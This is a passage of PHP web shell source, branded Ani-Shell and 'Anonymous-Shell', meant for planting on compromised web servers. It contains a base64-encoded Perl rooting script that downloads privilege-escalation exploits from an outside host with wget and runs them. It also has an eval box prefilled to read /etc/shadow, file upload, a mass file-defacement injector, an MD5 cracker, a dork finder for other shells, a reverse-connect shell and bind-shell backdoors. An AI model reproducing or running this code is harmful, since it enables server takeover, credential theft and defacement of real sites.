  1135. KTsgDQpzeXN0ZW0oImlkIik7IA0Kc3lzdGVtKCIuL2tyYWQgLXQgMSAtcCAzIik7IA0Kc3lzdGVt
  1136. KCJpZCIpOyANCnN5c3RlbSgiLi9rcmFkIC10IDEgLXAgNCIpOyANCnN5c3RlbSgiaWQiKTsgDQpz
  1137. eXN0ZW0oIi4va3JhZCAtdCAxIC1wIDUiKTsgDQpzeXN0ZW0oImlkIik7IA0Kc3lzdGVtKCIuL2ty
  1138. YWQgLXQgMSAtcCA2Iik7IA0Kc3lzdGVtKCJpZCIpOyANCnN5c3RlbSgiLi9rcmFkIC10IDEgLXAg
  1139. NyIpOyANCnN5c3RlbSgiaWQiKTsgDQpzeXN0ZW0oIi4va3JhZCAtdCAxIC1wIDgiKTsgDQpzeXN0
  1140. ZW0oImlkIik7IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmls
  1141. ZS9jYy9rLXJhZDMiKTsgDQpzeXN0ZW0oImNobW9kIDc3NyBrLXJhZDMiKTsgDQpzeXN0ZW0oIi4v
  1142. ay1yYWQzIC10IDEgLXAgMiIpOyANCnN5c3RlbSgiaWQiKTsgDQpzeXN0ZW0oIi4vay1yYWQzIC10
  1143. IDEgLXAgMyIpOyANCnN5c3RlbSgiaWQiKTsgDQpzeXN0ZW0oIi4vay1yYWQzIC10IDEgLXAgNCIp
  1144. OyANCnN5c3RlbSgiaWQiKTsgDQpzeXN0ZW0oIi4vay1yYWQzIC10IDEgLXAgNSIpOyANCnN5c3Rl
  1145. bSgiaWQiKTsgDQpzeXN0ZW0oIi4vay1yYWQzIC10IDEgLXAgNiIpOyANCnN5c3RlbSgiaWQiKTsg
  1146. DQpzeXN0ZW0oIi4vay1yYWQzIC10LXAgMiIpOyANCnN5c3RlbSgiaWQiKTsgDQpzeXN0ZW0oIi4v
  1147. ay1yYWQzIC10IC1wIDIiKTsgDQpzeXN0ZW0oImlkIik7IA0Kc3lzdGVtKCIuL2stcmFkMyAtYSAt
  1148. cCA3Iik7IA0Kc3lzdGVtKCJpZCIpOyANCnN5c3RlbSgiLi9rLXJhZDMgLWEgLXAgNyIpOyANCnN5
  1149. c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7
  1150. IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy8yNjgi
  1151. KTsgDQpzeXN0ZW0oImNobW9kIDc3NyAyNjgiKTsgDQpzeXN0ZW0oIi4vMjY4Iik7IA0KcHJpbnQg
  1152. IklmIHUgciByMDB0IHN0b3AgeHBsIHdpdGggY3RybCtjXG4iOyANCnN5c3RlbSgid2dldCBodHRw
  1153. Oi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvMjAwOCIpOyANCnN5c3RlbSgiY2htb2Qg
  1154. Nzc3IDIwMDgiKTsgDQpzeXN0ZW0oIi4vMjAwOCIpOyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAi
  1155. SWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7ICANCnN5c3RlbSgid2dldCBodHRw
  1156. Oi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvMjAwOXguYyIpOyANCnN5c3RlbSgiZ2Nj
  1157. IDIwMDl4LmMgLW8gMjAwOXgiKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgMjAwOXgiKTsgDQpzeXN0
  1158. ZW0oIi4vMjAwOXgiKTsgDQpzeXN0ZW0oImlkIik7IA0KcHJpbnQgIklmIHUgciByMDB0IHN0b3Ag
  1159. eHBsIHdpdGggY3RybCtjXG4iOw0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNf
  1160. RklMRVMvZmlsZS9jYy8yMDA5eHgiKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgMjAwOXh4Iik7IA0K
  1161. c3lzdGVtKCIuLzIwMDl4eCIpOyANCnN5c3RlbSgiaWQiKTsNCnN5c3RlbSgiaWQiKTsgDQpwcmlu
  1162. dCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7IA0Kc3lzdGVtKCJ3Z2V0IGh0
  1163. dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy8yLjYuOS01NS0yMDA3LXBydjgiKTsg
  1164. DQpzeXN0ZW0oImNobW9kIDc3NyAyLjYuOS01NS0yMDA3LXBydjgiKTsgDQpzeXN0ZW0oIi4vMi42
  1165. LjktNTUtMjAwNy1wcnY4Iik7IA0Kc3lzdGVtKCJpZCIpOyANCnN5c3RlbSgiLi8yLjYuOS01NS0y
  1166. MDA3LXBydjgiKTsgDQpzeXN0ZW0oImlkIik7IA0Kc3lzdGVtKCIuLzIuNi45LTU1LTIwMDctcHJ2
  1167. OCIpOyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBj
  1168. dHJsK2NcbiI7IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmls
  1169. ZS9jYy8xOCIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyAxOCIpOyANCnN5c3RlbSgiLi8xOCIpOyAN
  1170. CnN5c3RlbSgiaWQiKTsgDQpzeXN0ZW0oIndnZXQgaHR0cDovL3dhcjE5NzEuY29tL0NNU19GSUxF
  1171. Uy9maWxlL2NjLzgiKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgOCIpOyANCnN5c3RlbSgiLi84Iik7
  1172. IA0Kc3lzdGVtKCJpZCIpOyANCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJ
  1173. TEVTL2ZpbGUvY2MvZHoiKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgZHoiKTsgDQpzeXN0ZW0oIi4v
  1174. ZHoiKTsgDQpzeXN0ZW0oImlkIik7IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9D
  1175. TVNfRklMRVMvZmlsZS9jYy94ODYiKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgeDg2Iik7IA0Kc3lz
  1176. dGVtKCIuL3g4NiIpOyANCnN5c3RlbSgiaWQiKTsgDQpzeXN0ZW0oIndnZXQgaHR0cDovL3dhcjE5
  1177. NzEuY29tL0NNU19GSUxFUy9maWxlL2NjL2xvbCIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyBsb2wi
  1178. KTsgDQpzeXN0ZW0oIi4vbG9sIik7IA0Kc3lzdGVtKCJpZCIpOyANCn0=";
  1179.  
  1180.      $fd = fopen("r00t.pl","w");
  1181.  
  1182.             if ($fd != FALSE)
  1183.             {
  1184.                 fwrite($fd,base64_decode($r00t));
  1185.                 $out = exec_all("perl r00t.pl;");
  1186.                 if ($out != "")
  1187.                 {
  1188.             $cmd_out = exec_all("whoami");
  1189.             if ($cmd_out != "")
  1190.             {
  1191.                 if (strpos($cmd_out == 'root') !== false)
  1192.                     echo "<p class='alert_green'>You are ".trim(exec_all("whoami"))."</p>";
  1193.                 else
  1194.                     echo "<p class='alert_red'>You are ".trim(exec_all("whoami"))."</p>";
  1195.             }
  1196.             else
  1197.             {
  1198.                 echo "<p class='alert_red'>Rooting Failed</p>";
  1199.             }
  1200.                 }
  1201.         }
  1202.             else
  1203.             {
  1204.                 echo "<p class='alert_red'>Permission Denied</p>";
  1205.             }
  1206.     ?>
  1207.     <?php
  1208. }
  1209.  
  1210. // PHP evaluate
  1211.  
  1212. else if(isset($_GET['eval']))
  1213. {
  1214.     ?>
  1215.    
  1216.     <form method="POST">
  1217.     <textarea name="code" class="cmd" cols="100" rows="20"><?php
  1218.     // If the comand was sent
  1219.     if(isset($_POST['code'])
  1220.         && $_POST['code']
  1221.     )
  1222.     {
  1223.         // Filter Some Chars we dont need
  1224.  
  1225.         $code = str_replace("<?php","",$_POST['code']);
  1226.         $code = str_replace("<?","",$code);
  1227.         $code = str_replace("?>","",$code);
  1228.  
  1229.         // Evaluate PHP CoDE!
  1230.  
  1231.         echo htmlspecialchars(eval($code));
  1232.     }
  1233.     else
  1234.     {
  1235.         ?>echo file_get_contents('/etc/shadow');<?php
  1236.     }
  1237.     ?></textarea><br /><br />
  1238.     <input name="submit" value="Eval That COde! :D" class="own" type="submit" />
  1239.     </form>
  1240.  
  1241.     <?php
  1242.    
  1243. }
  1244.  
  1245. // Upload
  1246.  
  1247. else if(isset($_GET['upload']))
  1248. {
  1249.  
  1250.     if (isset($_POST['file']) &&
  1251.         isset($_POST['path'])
  1252.      )
  1253.     {
  1254.         $path = $_POST['path'];
  1255.            
  1256.         if($path[(strlen($path)-1)] != $SEPARATOR){$path = $path.$SEPARATOR;}
  1257.        
  1258.         if(is_dir($path))
  1259.         {
  1260.             $uploadedFilePath = $_FILES['file']['name'];
  1261.             $tempName = $_FILES['file']['tmp_name'];
  1262.             $uploadPath = $path .  $uploadedFilePath;
  1263.             $stat = move_uploaded_file($tempName , $uploadedFilePath);
  1264.             if ($stat)
  1265.             {
  1266.                 echo "<p class='alert_green'>File uploaded to $uploadPath</p>";
  1267.             }
  1268.             else
  1269.             {
  1270.                 echo "<p class='alert_red'>Failed to upload file to $uploadPath</p>";
  1271.             }
  1272.          }
  1273.     }
  1274.     else
  1275.     {
  1276.     ?>
  1277.     <table class="bind" align="center" >
  1278.     <tr>
  1279.         <th class="header" colspan="1" width="50px">Upload (From ur Computer)</th>
  1280.     </tr>
  1281.     <tr>
  1282.          <td>
  1283.             <table style="border-spacing: 6px;">
  1284.                 <form method="POST" enctype="multipart/form-data">
  1285.                
  1286.                 <tr>
  1287.                     <td width="100"><input type="file" name="file"/></td>
  1288.                     <td><input type="submit" name="file" class="own" value="Upload"/></td>
  1289.            
  1290.                 </tr>
  1291.                
  1292.                  <tr>
  1293.                     <td colspan="2">
  1294.                         <input class='cmd' style="width: 280px;" name='path' value="<?php echo getcwd(); ?>" />  
  1295.                     </td>
  1296.                 </tr>
  1297.                
  1298.                 </form>
  1299.             </table>
  1300.          </td>
  1301.     </tr>
  1302.     </table>
  1303. <?php
  1304.     }
  1305.  
  1306. }
  1307.  
  1308. // Code Injector
  1309.  
  1310. else if(isset($_GET['injector']))
  1311. {
  1312.     if(isset($_GET['dir']) &&
  1313.     $_GET['dir'] != '' &&
  1314.     isset($_GET['filetype']) &&
  1315.     $_GET['filetype'] != '' &&
  1316.     isset($_GET['mode']) &&
  1317.     $_GET['mode'] != '' &&
  1318.     isset($_GET['message']) &&
  1319.     $_GET['message'] != ''
  1320.     )
  1321.     {
  1322.         $dir = $_GET['dir'];
  1323.         $filetype = $_GET['filetype'];
  1324.         $message = $_GET['message'];
  1325.        
  1326.         $mode = "a"; //default mode
  1327.        
  1328.        
  1329.         // Modes Begin
  1330.        
  1331.         if($_GET['mode'] == 'Apender')
  1332.         {
  1333.             $mode = "a";
  1334.         }
  1335.         if($_GET['mode'] == 'Overwriter')
  1336.         {
  1337.             $mode = "w";
  1338.         }
  1339.        
  1340.         if($handle = opendir($dir))
  1341.         {
  1342.             ?>
  1343.             Overwritten Files :-
  1344.             <ul style="padding: 10px;" >
  1345.             <?php
  1346.             while(($file = readdir($handle)) !== False)
  1347.             {
  1348.                 if((preg_match("/$filetype".'$'.'/', $file , $matches) != 0) && (preg_match('/'.$file.'$/', $self , $matches) != 1))
  1349.                 {
  1350.                     ?>
  1351.                         <li class="file"><a href="<?php echo "$self?open=$dir$file"?>"><?php echo $file; ?></a></li>
  1352.                     <?php
  1353.                     echo "\n";
  1354.                     $fd = fopen($dir.$file,$mode);
  1355.             if (!$fd) echo "<p class='alert_red'>Permission Denied</p>"; break;
  1356.                     fwrite($fd,$message);
  1357.                 }
  1358.             }
  1359.             ?>
  1360.             </ul>
  1361.             <?php
  1362.         }
  1363.     }
  1364.     else
  1365.     {
  1366.         ?>
  1367.         <table id="margins" >
  1368.         <tr>
  1369.             <form method='GET'>
  1370.             <input type="hidden" name="injector"/>  
  1371.                 <tr>
  1372.                     <td width="100" class="title">
  1373.                         Directory
  1374.                     </td>
  1375.                     <td>
  1376.                          <input class="cmd" name="dir" value="<?php echo getcwd().$SEPARATOR; ?>" />
  1377.                     </td>
  1378.                 </tr>
  1379.                 <tr>
  1380.                 <td class="title">
  1381.                     Mode
  1382.                 </td>
  1383.                 <td>
  1384.                         <select style="width: 400px;" name="mode" class="cmd">
  1385.                             <option value="Apender">Apender</option>
  1386.                             <option value="Overwriter">Overwriter</option>
  1387.                         </select>
  1388.                 </td>
  1389.                 </tr>
  1390.                 <tr>
  1391.                     <td class="title">
  1392.                         File Type
  1393.                     </td>
  1394.                     <td>
  1395.                         <input type="text" class="cmd" name="filetype" value=".php" onblur="if(this.value=='')this.value='.php';" />
  1396.                     </td>
  1397.                 </tr>
  1398.                
  1399.                
  1400.                 <tr>
  1401.                     <td colspan="2">
  1402.                         <textarea name="message" cols="110" rows="10" class="cmd">All i remember are those lonely nights when i was defacing those insecure websites!</textarea>
  1403.                     </td>
  1404.                 </tr>
  1405.                
  1406.                
  1407.                 <tr>
  1408.                     <td rowspan="2">
  1409.                         <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="own" value="Inject :D"/>
  1410.                     </td>
  1411.                 </tr>
  1412.         </form>
  1413.         </table>
  1414.         <?php
  1415.     }
  1416. }
  1417.  
  1418. // MD5 Cracker
  1419.  
  1420. else if(isset($_GET['md5']))
  1421. {
  1422.     if(isset($_GET['hash']) &&
  1423.     isset($_GET['passwdList']) &&
  1424.     $_GET['hash'] != '' &&
  1425.     $_GET['passwdList'] != '')
  1426.    
  1427.     {
  1428.         echo md5Crack($_GET['hash'],$_GET['passwdList']);
  1429.     }
  1430.     else
  1431.     {
  1432.         ?>
  1433.         <table id="margins" >
  1434.         <tr>
  1435.             <form method='GET'>
  1436.                 <input type="hidden" name="md5" />
  1437.                 <tr>
  1438.                     <td width="100" class="title">
  1439.                         Hash
  1440.                     </td>
  1441.                     <td>
  1442.                          <input class="cmd" name="hash"/>
  1443.                     </td>
  1444.                 </tr>
  1445.                 <tr>
  1446.                 <td class="title">
  1447.                     Password List (File Path)
  1448.                 </td>
  1449.                 <td>
  1450.                     <input class="cmd" name="passwdList" value="<?php echo getcwd().$SEPARATOR; ?>" />
  1451.                 </td>
  1452.                 </tr>
  1453.                 <tr>
  1454.                 <tr>
  1455.                     <td rowspan="2">
  1456.                         <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="own" value="Lets Crack :D"/>
  1457.                     </td>
  1458.                 </tr>
  1459.         </form>
  1460.         </table>
  1461.        
  1462.         <?php
  1463.     }
  1464. }
  1465.  
  1466. // Google Dork Creater
  1467.  
  1468. else if(isset($_GET['gdork']))
  1469. {
  1470.     if(
  1471.     isset($_GET['title']) ||
  1472.     isset($_GET['text']) ||
  1473.     isset($_GET['url']) ||
  1474.     isset($_GET['site'])
  1475.     )
  1476.     {
  1477.         $title = $_GET['title'];
  1478.         $text = $_GET['text'];
  1479.         $url = $_GET['url'];
  1480.         $site = $_GET['site'];
  1481.        
  1482.         if($title != "")
  1483.         {
  1484.             $title = " intitle:\"".$title."\" ";
  1485.         }
  1486.         if($text != "")
  1487.         {
  1488.             $text = " intext:\"".$text."\" ";
  1489.         }
  1490.         if($url != "")
  1491.         {
  1492.             $url = " inurl:\"".$url."\" ";
  1493.         }
  1494.         if($site != "")
  1495.         {
  1496.             $site = " site:\"".$site."\" ";
  1497.         }
  1498.        
  1499.         // Print the output now
  1500.         ?>
  1501.         <div align="center">
  1502.         <form action="http://google.com" method="GET">
  1503.             <input class="cmd" style="border: solid red 1px;" name="q" value='<?php echo $title.$text.$url.$site ?>' /><br />
  1504.             <input type="submit" style="Padding:5px;" class="own" value='Google It! ;)' />
  1505.         </form>
  1506.         </div>
  1507.         <?php
  1508.     }
  1509.     else
  1510.     {
  1511.     ?>
  1512.     <p align="center" style="color:red;">Note : Any one of the following options is compulsory to be filled rest can be left blank.</p>
  1513.      <table id="margins" >
  1514.         <tr>
  1515.             <form method='GET'>
  1516.                 <input type="hidden" name="gdork" />
  1517.                 <tr>
  1518.                     <td width="100" class="title">
  1519.                         intitle
  1520.                     </td>
  1521.                     <td>
  1522.                          <input class="cmd" name="title" value="Ani-Shell"/>
  1523.                     </td>
  1524.                 </tr>
  1525.                 <tr>
  1526.                 <td class="title">
  1527.                     intext
  1528.                 </td>
  1529.                 <td>
  1530.                     <input class="cmd" name="text" value="lionaneesh" />
  1531.                 </td>
  1532.                 </tr>
  1533.                 <tr>
  1534.                     <td width="100" class="title">
  1535.                         inurl
  1536.                     </td>
  1537.                     <td>
  1538.                          <input class="cmd" name="url" value="Ani-Shell.php"/>
  1539.                     </td>
  1540.                 </tr>
  1541.                 <tr>
  1542.                     <td width="100" class="title">
  1543.                         site
  1544.                     </td>
  1545.                     <td>
  1546.                          <input class="cmd" name="site" value="*.org"/>
  1547.                     </td>
  1548.                 </tr>
  1549.                 <tr>
  1550.                     <td rowspan="2" >
  1551.                         <input style="margin : 20px; margin-left: 390px; padding : 10px;" type="submit" class="own" value="Gimme the Dork!"/>
  1552.                     </td>
  1553.                 </tr>
  1554.         </form>
  1555.         </table>
  1556.     <?php
  1557.     }
  1558. }
  1559.  
  1560.  
  1561. // Connect
  1562.  
  1563.  
  1564. else if(isset($_GET['connect']))
  1565. {
  1566.     if(isset($_POST['ip']) &&
  1567.      isset($_POST['port']) &&
  1568.         $_POST['ip'] != "" &&
  1569.         $_POST['port'] != ""
  1570.      )
  1571.     {
  1572.         echo "<p>The Program is now trying to connect!</p>";
  1573.         $ip = $_POST['ip'];
  1574.         $port=$_POST['port'];
  1575.         $sockfd=fsockopen($ip , $port , $errno, $errstr );
  1576.         if($errno != 0)
  1577.         {
  1578.             echo "<font color='red'><b>$errno</b> : $errstr</font>";
  1579.         }
  1580.         else if (!$sockfd)
  1581.         {
  1582.                $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>";
  1583.         }
  1584.         else
  1585.         {
  1586.             fputs ($sockfd ,"\n=================================================================\nAnonymous-Shell | C0d3d by Mauritania Attacker | BR\n=================================================================");
  1587.          $pwd = exec_all("pwd");
  1588.          $sysinfo = exec_all("uname -a");
  1589.          $id = exec_all("id");
  1590.          $dateAndTime = exec_all("time /t & date /T");
  1591.          $len = 1337;
  1592.          fputs($sockfd ,$sysinfo . "\n" );
  1593.          fputs($sockfd ,$pwd . "\n" );
  1594.          fputs($sockfd ,$id ."\n\n" );
  1595.          fputs($sockfd ,$dateAndTime."\n\n" );
  1596.          while(!feof($sockfd))
  1597.          {  
  1598.             $cmdPrompt ="(Ani-Shell)[$]> ";
  1599.             fputs ($sockfd , $cmdPrompt );
  1600.             $command= fgets($sockfd, $len);
  1601.             fputs($sockfd , "\n" . exec_all($command) . "\n\n");
  1602.         }
  1603.         fclose($sockfd);
  1604.         }
  1605.     }
  1606.     else if(
  1607.     isset($_POST['port']) &&
  1608.     isset($_POST['passwd']) &&
  1609.     $_POST['port'] != "" &&
  1610.     $_POST['passwd'] != ""  &&
  1611.     isset($_POST['mode']))
  1612.     {
  1613.         $address = '127.0.0.1';
  1614.         $port = $_POST['port'];
  1615.         $pass = $_POST['passwd'];
  1616.        
  1617.         if($_POST['mode'] == "Python")
  1618.         {
  1619.             $Python_CODE = "IyBTZXJ2ZXIgIA0KIA0KaW1wb3J0IHN5cyAgDQppbXBvcnQgc29ja2V0ICANCmltcG9ydCBvcyAgDQoNCmhvc3QgPSAnJzsgIA0KU0laRSA9IDUxMjsgIA0KDQp0cnkgOiAgDQogICAgIHBvcnQgPSBzeXMuYXJndlsxXTsgIA0KDQpleGNlcHQgOiAgDQogICAgIHBvcnQgPSAzMTMzNzsgIA0KIA0KdHJ5IDogIA0KICAgICBzb2NrZmQgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICwgc29ja2V0LlNPQ0tfU1RSRUFNKTsgIA0KDQpleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCg0KICAgICBwcmludCAiRXJyb3IgaW4gY3JlYXRpbmcgc29ja2V0IDogIixlIDsgIA0KICAgICBzeXMuZXhpdCgxKTsgICANCg0Kc29ja2ZkLnNldHNvY2tvcHQoc29ja2V0LlNPTF9TT0NLRVQgLCBzb2NrZXQuU09fUkVVU0VBRERSICwgMSk7ICANCg0KdHJ5IDogIA0KICAgICBzb2NrZmQuYmluZCgoaG9zdCxwb3J0KSk7ICANCg0KZXhjZXB0IHNvY2tldC5lcnJvciAsIGUgOiAgICAgICAgDQogICAgIHByaW50ICJFcnJvciBpbiBCaW5kaW5nIDogIixlOyANCiAgICAgc3lzLmV4aXQoMSk7ICANCiANCnByaW50KCJcblxuPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KcHJpbnQoIi0tLS0tLS0tIFNlcnZlciBMaXN0ZW5pbmcgb24gUG9ydCAlZCAtLS0tLS0tLS0tLS0tLSIgJSBwb3J0KTsgIA0KcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PVxuXG4iKTsgDQogDQp0cnkgOiAgDQogICAgIHdoaWxlIDEgOiAjIGxpc3RlbiBmb3IgY29ubmVjdGlvbnMgIA0KICAgICAgICAgc29ja2ZkLmxpc3RlbigxKTsgIA0KICAgICAgICAgY2xpZW50c29jayAsIGNsaWVudGFkZHIgPSBzb2NrZmQuYWNjZXB0KCk7ICANCiAgICAgICAgIHByaW50KCJcblxuR290IENvbm5lY3Rpb24gZnJvbSAiICsgc3RyKGNsaWVudGFkZHIpKTsgIA0KICAgICAgICAgd2hpbGUgMSA6ICANCiAgICAgICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIGNtZCA9IGNsaWVudHNvY2sucmVjdihTSVpFKTsgIA0KICAgICAgICAgICAgIGV4Y2VwdCA6ICANCiAgICAgICAgICAgICAgICAgYnJlYWs7ICANCiAgICAgICAgICAgICBwaXBlID0gb3MucG9wZW4oY21kKTsgIA0KICAgICAgICAgICAgIHJhd091dHB1dCA9IHBpcGUucmVhZGxpbmVzKCk7ICANCiANCiAgICAgICAgICAgICBwcmludChjbWQpOyAgDQogICAgICAgICAgIA0KICAgICAgICAgICAgIGlmIGNtZCA9PSAnZzJnJzogIyBjbG9zZSB0aGUgY29ubmVjdGlvbiBhbmQgbW92ZSBvbiBmb3Igb3RoZXJzICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tLS0tLS0tLS0iKTsgIA0KICAgICAgICAgICAgICAgICBjbGllbnRzb2NrLnNodXRkb3duKCk7ICANCiAgICAgICAgICAgICAgICAgYnJlYWs7ICANCiAgICAgICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIG91dHB1dCA9ICIiOyAgDQogICAgICAgICAgICAgICAgICMgUGFyc2UgdGhlIG91dHB1dCBmcm9tIGxpc3QgdG8gc3RyaW5nICANCiAgICAgICAgICAgICAgICAgZm9yIGRhdGEgaW4gcmF3T3V0cHV0IDogIA0KICAgICAgICAgICAgICAgICAgICAgIG91dHB1dCA9IG91dHB1dCtkYXRhOyAgDQogICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgIGNsaWVudHNvY2suc2VuZCgiQ29tbWFuZCBPdXRwdXQgOi0gXG4iK291dHB1dCsiXHJcbiIpOyAgDQogICAgICAgICAgICAgICANCiAgICAgICAgICAgICBleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCiAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tIik7ICANCiAgICAgICAgICAgICAgICAgY2xpZW50c29jay5jbG9zZSgpOyAgDQogICAgICAgICAgICAgICAgIGJyZWFrOyAgDQpleGNlcHQgIEtleWJvYXJkSW50ZXJydXB0IDogIA0KIA0KDQogICAgIHByaW50KCJcblxuPj4+PiBTZXJ2ZXIgVGVybWluYXRlZCA8PDw8PFxuIik7ICANCiAgICAgcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KICAgICBwcmludCgiXHRUaGFua3MgZm9yIHVzaW5nIEFuaS1zaGVsbCdzIC0tIFNpbXBsZSAtLS0gQ01EIik7ICANCiAgICAgcHJpbnQoIlx0RW1haWwgOiBsaW9uYW5lZXNoQGdtYWlsLmNvbSIpOyAgDQogICAgIHByaW50KCI9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0iKTsNCg==";
  1620.  
  1621.             $fd = fopen("bind.py","w");
  1622.  
  1623.             if($fd != FALSE)
  1624.             {
  1625.                 fwrite($fd,base64_decode($Python_CODE));
  1626.                
  1627.                 if($os == "Linux")
  1628.                 {
  1629.                     echo "[+] OS Detected = Windows";
  1630.                     exec_all("chmod +x bind.py ; ./bind.py");
  1631.                    
  1632.                     // CHeck if the process is running
  1633.            
  1634.                     $pattern = "bind.py";
  1635.            
  1636.                     $list = exec_all("ps -aux");
  1637.                 }
  1638.                 else
  1639.                 {
  1640.                     echo "[+] OS Detected = Windows";
  1641.                     exec_all("start bind.py");
  1642.                     // CHeck if the process is running
  1643.            
  1644.                     $pattern = "python.exe";
  1645.            
  1646.                     $list = exec_all("TASKLIST");
  1647.                 }
  1648.                
  1649.                
  1650.                 if(preg_match("/$pattern/",$list))
  1651.                 {
  1652.                         echo "<p class='alert_green'>Process Found Running! Backdoor Setuped Successfully! :D</p>";
  1653.                 }
  1654.                 else
  1655.                 {
  1656.                     echo "<p class='alert_red'>Process Not Found Running! Backdoor Setup FAILED :(</p>";
  1657.                 }
  1658.                
  1659.                 echo "<br /><br />\n<b>Task List :-</b> <pre>\n$list</pre>";
  1660.                
  1661.             }
  1662.         }
  1663.     }
  1664.     else if($_POST['mode'] == "PHP")
  1665.     {
  1666.            
  1667.         // Set time limit to indefinite execution
  1668.         set_time_limit (0);
  1669.        
  1670.        
  1671.         // Set the ip and port we will listen on
  1672.        
  1673.  
  1674.         if(function_exists("socket_create"))
  1675.         {
  1676.         // Create a TCP Stream socket
  1677.         $sockfd = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  1678.  
  1679.      
  1680.         // Bind the socket to an address/port
  1681.        
  1682.        
  1683.         if(socket_bind($sockfd, $address, $port) == FALSE)
  1684.         {
  1685.             echo "Cant Bind to the specified port and address!";
  1686.         }
  1687.         // Start listening for connections
  1688.         socket_listen($sockfd,15);
  1689.        
  1690.    
  1691.         $passwordPrompt = "\n=================================================================\nAnonymous-Shell | C0d3d by Mauritania Attacker | BR\n=================================================================\n\n0xPassword : ";
  1692.        
  1693.         /* Accept incoming requests and handle them as child processes */
  1694.         $client = socket_accept($sockfd);
  1695.        
  1696.  
  1697.         socket_write($client , $passwordPrompt);
  1698.         // Read the pass from the client
  1699.         $input = socket_read($client, strlen($pass) + 2); // +2 for \r\n
  1700.         if(trim($input) == $pass)
  1701.         {
  1702.             socket_write($client , "\n\n");
  1703.             socket_write($client , ($os == "Windows") ? exec_all("date /t & time /t")  . "\n" . exec_all("ver") : exec_all("date") . "\n" . exec_all("uname -a"));
  1704.             socket_write($client , "\n\n");
  1705.             while(1)
  1706.             {
  1707.                 // Print Command prompt
  1708.                 $commandPrompt ="(Ani-Shell)[$]> ";
  1709.                 $maxCmdLen = 31337;
  1710.                 socket_write($client,$commandPrompt);
  1711.                 $cmd = socket_read($client,$maxCmdLen);
  1712.                 if($cmd == FALSE)
  1713.                 {
  1714.                     echo "The client Closed the conection!";
  1715.                     break;
  1716.                 }
  1717.                 socket_write($client , exec_all($cmd));
  1718.             }
  1719.         }
  1720.         else
  1721.         {
  1722.             echo "Wrong Password!";
  1723.             socket_write($client, "sU(|< - 0FF Bitch!\n\n");
  1724.         }
  1725.         socket_shutdown($client, 2);
  1726.         socket_close($socket);
  1727.        
  1728.         // Close the client (child) socket
  1729.         //socket_close($client);
  1730.         // Close the master sockets
  1731.         //socket_close($sock);
  1732.         }
  1733.         else
  1734.         {
  1735.             echo "Socket Conections not Allowed/Supported by the server! <br />";
  1736.         }
  1737.     }
  1738.     else
  1739.     {
  1740.     ?>      
  1741.     <table class="bind" align="center" >
  1742.     <tr>
  1743.         <th class="header" colspan="1" width="50px">Back Connect</th>
  1744.         <th class="header" colspan="1" width="50px">Bind Shell</th>
  1745.     </tr>
  1746.     <tr>
  1747.         <form method='POST' >  
  1748.          <td>
  1749.             <table style="border-spacing: 6px;">
  1750.                 <tr>
  1751.                     <td>IP </td>
  1752.                     <td>
  1753.                         <input style="width: 200px;" class="cmd" name="ip" value="<?php getClientIp();?>" />
  1754.                     </td>
  1755.                 </tr>
  1756.                 <tr>
  1757.                     <td>Port </td>
  1758.                     <td><input style="width: 100px;" class="cmd" name="port" size='5' value="31337"/></td>
  1759.                 </tr>
  1760.                 <tr>
  1761.                 <td>Mode </td>    
  1762.                 <td>
  1763.                         <select name="mode" class="cmd">
  1764.                             <option value="PHP">PHP</option>
